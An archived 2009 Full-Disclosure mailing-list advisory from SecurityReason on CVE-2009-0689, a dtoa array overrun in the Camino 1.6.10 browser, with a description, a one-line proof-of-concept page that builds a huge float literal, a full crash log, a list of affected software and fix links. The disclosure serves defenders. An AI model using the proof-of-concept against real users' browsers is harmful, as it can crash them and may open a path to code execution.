lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 11 Dec 2009 00:45:55 +0100
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: SecurityReason: Camino 1.6.10 Remote Array
 Overrun (Arbitrary code execution)

[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Camino 1.6.10

Fixed in:
- Camino 2.0 <=

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/76


--- 0.Description ---
Camino (from the Spanish word camino meaning "way", "path" or "road") is
a free, open source, GUI-based Web browser based on Mozilla's Gecko
layout engine and specifically designed for the Mac OS X operating
system. In place of an XUL-based user interface used by most
Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although
it does not use native text boxes.

--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Camino has the same dtoa
as Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same like SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.


--- 2. Proof of Concept  (PoC) ---
-----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
-----------------------

Process:         Camino [153]
Path:            /Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier:      org.mozilla.camino
Version:         1.6.10 (1609.09.25)
Code Type:       X86 (Native)
Parent Process:  launchd [92]

Date/Time:       2009-11-06 12:57:24.698 -0800
OS Version:      Mac OS X 10.5.6 (9G55)
Report Version:  6

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590
Crashed Thread:  0

Thread 0 Crashed:
0   libSystem.B.dylib             	0x01d7e325 tiny_malloc_from_free_list
+ 235
1   libSystem.B.dylib             	0x01d7710d szone_malloc + 180
2   libSystem.B.dylib             	0x01d77018 malloc_zone_malloc + 81
3   libSystem.B.dylib             	0x01d76fac malloc + 55
4   libxpcom_core.dylib           	0x00c5271d PL_DHashTableInit + 220
5   org.mozilla.camino            	0x00389bac RuleHash::RuleHash(int) + 282
6   org.mozilla.camino            	0x0038ae0e
nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7   org.mozilla.camino            	0x0038b215
nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8   org.mozilla.camino            	0x003afbd0
EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24
9   org.mozilla.camino            	0x003b0885 nsStyleSet::FileRules(int
(*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37
10  org.mozilla.camino            	0x003b0c77
nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*,
nsStyleContext*, nsICSSPseudoComparator*) + 123
11  org.mozilla.camino            	0x002cc924
nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12  org.mozilla.camino            	0x002f617b
PresShell::InitialReflow(int, int) + 1151
13  org.mozilla.camino            	0x005a90d4
nsContentSink::StartLayout(int) + 342
14  org.mozilla.camino            	0x00483354
HTMLContentSink::StartLayout() + 82
15  org.mozilla.camino            	0x00486cb7
HTMLContentSink::OpenBody(nsIParserNode const&) + 193
16  org.mozilla.camino            	0x001a60e8
CNavDTD::OpenBody(nsCParserNode const*) + 54
17  org.mozilla.camino            	0x001a8b53
CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393
18  org.mozilla.camino            	0x001aa3e5
CNavDTD::HandleStartToken(CToken*) + 623
19  org.mozilla.camino            	0x001aaaa2
CNavDTD::HandleToken(CToken*, nsIParser*) + 1358
20  org.mozilla.camino            	0x001a9a4d
CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*,
nsIContentSink*) + 165
21  org.mozilla.camino            	0x001a94ee
CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550
22  org.mozilla.camino            	0x001b5e28
nsParser::DidBuildModel(unsigned int) + 90
23  org.mozilla.camino            	0x001b83c7 nsParser::ResumeParse(int,
int, int) + 661
24  org.mozilla.camino            	0x001b59a8
nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128
25  org.mozilla.camino            	0x002076a0
nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned
int) + 88
26  org.mozilla.camino            	0x000f522a
nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78
27  org.mozilla.camino            	0x000baf18
nsInputStreamPump::OnStateStop() + 88
28  org.mozilla.camino            	0x000bb49d
nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133
29  libxpcom_core.dylib           	0x00cb7d4d nsAStreamCopier::Process()
+ 751
30  libxpcom_core.dylib           	0x00c8f251 PL_HandleEvent + 21
31  libxpcom_core.dylib           	0x00c8f50a PL_ProcessPendingEvents + 103
32  com.apple.CoreFoundation      	0x014455f5 CFRunLoopRunSpecific + 3141
33  com.apple.CoreFoundation      	0x01445cd8 CFRunLoopRunInMode + 88
34  com.apple.HIToolbox           	0x02d8b2c0 RunCurrentEventLoopInMode
+ 283
35  com.apple.HIToolbox           	0x02d8b0d9 ReceiveNextEventCommon + 374
36  com.apple.HIToolbox           	0x02d8af4d
BlockUntilNextEventMatchingListInMode + 106
37  com.apple.AppKit              	0x05e94d7d _DPSNextEvent + 657
38  com.apple.AppKit              	0x05e94630 -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
39  com.apple.AppKit              	0x05e8d66b -[NSApplication run] + 795
40  com.apple.AppKit              	0x05e5a8a4 NSApplicationMain + 574
41  org.mozilla.camino            	0x0000364c main + 196
42  org.mozilla.camino            	0x00002f1e _start + 216
43  org.mozilla.camino            	0x00002e45 start + 41

Thread 1:
0   libSystem.B.dylib             	0x01dad30a
select$DARWIN_EXTSN$NOCANCEL + 10
1   libnspr4.dylib                	0x00d3940e poll + 258
2   libnspr4.dylib                	0x00d35cc6 PR_Poll + 134
3   org.mozilla.camino            	0x000cb897
nsSocketTransportService::Poll(unsigned int*) + 99
4   org.mozilla.camino            	0x000cbe75
nsSocketTransportService::Run() + 497
5   libxpcom_core.dylib           	0x00c91baf nsThread::Main(void*) + 41
6   libnspr4.dylib                	0x00d37309 _pt_root + 150
7   libSystem.B.dylib             	0x01da7095 _pthread_start + 321
8   libSystem.B.dylib             	0x01da6f52 thread_start + 34

Thread 2:
0   libSystem.B.dylib             	0x01d76226
semaphore_timedwait_signal_trap + 10
1   libSystem.B.dylib             	0x01da81ef _pthread_cond_wait + 1244
2   libSystem.B.dylib             	0x01df2aaf pthread_cond_timedwait + 47
3   libnspr4.dylib                	0x00d32970 pt_TimedWait + 207
4   libnspr4.dylib                	0x00d32cc7 PR_WaitCondVar + 75
5   libxpcom_core.dylib           	0x00c93be2 TimerThread::Run() + 74
6   libxpcom_core.dylib           	0x00c91baf nsThread::Main(void*) + 41
7   libnspr4.dylib                	0x00d37309 _pt_root + 150
8   libSystem.B.dylib             	0x01da7095 _pthread_start + 321
9   libSystem.B.dylib             	0x01da6f52 thread_start + 34

Thread 3:
0   libSystem.B.dylib             	0x01d76226
semaphore_timedwait_signal_trap + 10
1   libSystem.B.dylib             	0x01da81ef _pthread_cond_wait + 1244
2   libSystem.B.dylib             	0x01df2aaf pthread_cond_timedwait + 47
3   libnspr4.dylib                	0x00d32970 pt_TimedWait + 207
4   libnspr4.dylib                	0x00d32cc7 PR_WaitCondVar + 75
5   org.mozilla.camino            	0x000b539d
nsIOThreadPool::ThreadFunc(void*) + 145
6   libnspr4.dylib                	0x00d37309 _pt_root + 150
7   libSystem.B.dylib             	0x01da7095 _pthread_start + 321
8   libSystem.B.dylib             	0x01da6f52 thread_start + 34

Thread 4:
0   libSystem.B.dylib             	0x01d7d3ae __semwait_signal + 10
1   libSystem.B.dylib             	0x01da7d0d pthread_cond_wait$UNIX2003
+ 73
2   com.apple.QuartzCore          	0x052c6ab9 fe_fragment_thread + 54
3   libSystem.B.dylib             	0x01da7095 _pthread_start + 321
4   libSystem.B.dylib             	0x01da6f52 thread_start + 34

Thread 5:
0   libSystem.B.dylib             	0x01d76226
semaphore_timedwait_signal_trap + 10
1   libSystem.B.dylib             	0x01da81ef _pthread_cond_wait + 1244
2   libSystem.B.dylib             	0x01df2aaf pthread_cond_timedwait + 47
3   libnspr4.dylib                	0x00d32970 pt_TimedWait + 207
4   libnspr4.dylib                	0x00d32cc7 PR_WaitCondVar + 75
5   org.mozilla.camino            	0x000d43ce
nsHostResolver::GetHostToLookup(nsHostRecord**) + 212
6   org.mozilla.camino            	0x000d4b2d
nsHostResolver::ThreadFunc(void*) + 123
7   libnspr4.dylib                	0x00d37309 _pt_root + 150
8   libSystem.B.dylib             	0x01da7095 _pthread_start + 321
9   libSystem.B.dylib             	0x01da6f52 thread_start + 34

Thread 6:
0   libSystem.B.dylib             	0x01dc56f2 select$DARWIN_EXTSN + 10
1   libSystem.B.dylib             	0x01da7095 _pthread_start + 321
2   libSystem.B.dylib             	0x01da6f52 thread_start + 34

Thread 7:
0   libSystem.B.dylib             	0x01d76226
semaphore_timedwait_signal_trap + 10
1   libSystem.B.dylib             	0x01da81ef _pthread_cond_wait + 1244
2   libSystem.B.dylib             	0x01df2aaf pthread_cond_timedwait + 47
3   libnspr4.dylib                	0x00d32970 pt_TimedWait + 207
4   libnspr4.dylib                	0x00d32cc7 PR_WaitCondVar + 75
5   org.mozilla.camino            	0x000b539d
nsIOThreadPool::ThreadFunc(void*) + 145
6   libnspr4.dylib                	0x00d37309 _pt_root + 150
7   libSystem.B.dylib             	0x01da7095 _pthread_start + 321
8   libSystem.B.dylib             	0x01da6f52 thread_start + 34

Thread 0 crashed with X86 Thread State (32-bit):
  eax: 0xf8051a22  ebx: 0x01d7e255  ecx: 0x07e8fca0  edx: 0x7e33d590
  edi: 0x07d5c000  esi: 0x07e00000  ebp: 0xbfffe208  esp: 0xbfffe190
   ss: 0x0000001f  efl: 0x00010206  eip: 0x01d7e325   cs: 0x00000017
   ds: 0x0000001f   es: 0x0000001f   fs: 0x00000000   gs: 0x00000037
  cr2: 0x7e33d590

--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock

This list is not yet closed.

--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


--- 5. Credits ---
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.


--- 6. Greets ---
Infospec p_e_a pi3


--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/



Download attachment "signature.asc" of type "application/pgp-signature" (164 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists